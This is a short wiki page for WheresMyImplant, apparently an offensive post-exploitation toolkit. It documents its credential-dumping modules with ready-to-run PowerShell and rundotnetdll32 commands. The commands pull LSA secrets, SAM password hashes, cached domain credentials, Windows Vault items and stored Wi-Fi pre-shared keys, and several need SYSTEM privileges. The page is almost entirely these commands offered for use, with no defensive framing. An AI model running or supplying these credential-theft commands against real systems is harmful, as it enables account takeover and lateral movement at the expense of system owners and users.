Skip to content

Credential Modules

Jump to bottom
Alexander edited this page Oct 16, 2018 · 2 revisions

LSA Secrets

Overview

Reads the LSA Secrets (e.g. plaintext service logon credentials) from the Windows Registry. Requires SYSTEM privileges.

PowerShell

[WheresMyImplant.Credentials]::DumpLSA()

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpLSA

SAM

Overview

Reads the local user password hashes from the registry. Requires SYSTEM privileges.

PowerShell

[WheresMyImplant.Credentials]::DumpSAM()

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpSAM

Domain Cached Credentials

Overview

Reads the cached Domain User credentials. Requires SYSTEM privileges.

PowerShell

[WheresMyImplant.Credentials]::DumpDomainCache()

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpDomainCache

Windows Vault

Overview

Reads the Windows Vault for items stored with the DPAPI.

PowerShell

[WheresMyImplant.Credentials]::DumpVault()

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpVault

Windows Vault CLI

Overview

Reads the Windows Vault for items stored with the DPAPI. Alternative method to accessing the Windows Vault

PowerShell

[WheresMyImplant.Credentials]::DumpVaultCLI()

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpVaultCLI

Wireless PreShared Keys

Overview

Reads wireless preshared keys from the stored wireless profiles.

PowerShell

[WheresMyImplant.Credentials]::WirelessPreSharedKey()

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,WirelessPreSharedKey

Clone this wiki locally